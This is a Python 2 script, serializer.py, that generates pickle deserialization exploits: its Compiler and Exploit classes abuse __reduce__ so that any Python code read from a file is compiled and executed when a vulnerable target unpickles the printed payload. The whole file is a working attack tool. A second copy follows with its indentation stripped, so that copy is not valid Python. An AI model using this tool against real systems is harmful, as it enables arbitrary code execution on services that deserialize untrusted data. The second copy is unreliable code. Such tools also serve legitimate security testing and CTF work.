Foo-Manroot/serializer.py

## serializer.py
#!/usr/bin/env python2
# -*- coding: utf-8 -*-

__author__ = "Foo-Manroot"
__license__ = "GPL"
__version__ = "1.0"

"""
Little script to serualize with pickle a custom code to exploit a vulnerable target.

Copyright © 2018 Foo-Manroot

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program.  If not, see <http://www.gnu.org/licenses/>.
"""

import sys
import cPickle as pickle


class Compiler (object):
    """
    Additional class to compile the provided code, as pickle can't serialize
    code objects
    """
    def __init__ (self, code):
        self.code = code

    def __reduce__ (self):
        return ( compile, (self.code, '<string>', 'exec') )


class Exploit (object):
    """
    Main class to evaluate code at unserialization
    """
    def __init__ (self, code):
        self.code = code

    def __reduce__ (self):
        return ( eval, (Compiler (self.code), ) )


if __name__ == "__main__":

    if (len (sys.argv) <= 1
        or
        sys.argv [1].lower () == "-h"
        or
        sys.argv [1].lower () == "--help"
    ):
        print ("Script to serialize with pickle a code to exploit a vulnerable target")
        print ("Foo-Manroot - 2018\n")
        print ("Usage:")
        print (sys.argv [0] + " [-h | --help | FILE]\n")

        print ("The available options are:")
        print ("\tFILE")
        print ("\t\tA file with the Python source code to be serialized")

        print ("\t-h")
        print ("\t--help")
        print ("\t\tShows this help message")

        exit (1)


    code = open (sys.argv [1], "r").read ()

    # This is the only thing being printed, so it can be piped for the exploitation
    print (pickle.dumps (Exploit (code)))
	#!/usr/bin/env python2
	# -- coding: utf-8 --

	__author__ = "Foo-Manroot"
	__license__ = "GPL"
	__version__ = "1.0"

	"""
	Little script to serualize with pickle a custom code to exploit a vulnerable target.

	Copyright © 2018 Foo-Manroot

	This program is free software: you can redistribute it and/or modify
	it under the terms of the GNU General Public License as published by
	the Free Software Foundation, either version 3 of the License, or
	(at your option) any later version.

	This program is distributed in the hope that it will be useful,
	but WITHOUT ANY WARRANTY; without even the implied warranty of
	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
	GNU General Public License for more details.

	You should have received a copy of the GNU General Public License
	along with this program. If not, see <http://www.gnu.org/licenses/>.
	"""

	import sys
	import cPickle as pickle


	class Compiler (object):
	"""
	Additional class to compile the provided code, as pickle can't serialize
	code objects
	"""
	def __init__ (self, code):
	self.code = code

	def __reduce__ (self):
	return ( compile, (self.code, '<string>', 'exec') )


	class Exploit (object):
	"""
	Main class to evaluate code at unserialization
	"""
	def __init__ (self, code):
	self.code = code

	def __reduce__ (self):
	return ( eval, (Compiler (self.code), ) )


	if __name__ == "__main__":

	if (len (sys.argv) <= 1
	or
	sys.argv [1].lower () == "-h"
	or
	sys.argv [1].lower () == "--help"
	):
	print ("Script to serialize with pickle a code to exploit a vulnerable target")
	print ("Foo-Manroot - 2018\n")
	print ("Usage:")
	print (sys.argv [0] + " [-h \| --help \| FILE]\n")

	print ("The available options are:")
	print ("\tFILE")
	print ("\t\tA file with the Python source code to be serialized")

	print ("\t-h")
	print ("\t--help")
	print ("\t\tShows this help message")

	exit (1)


	code = open (sys.argv [1], "r").read ()

	# This is the only thing being printed, so it can be piped for the exploitation
	print (pickle.dumps (Exploit (code)))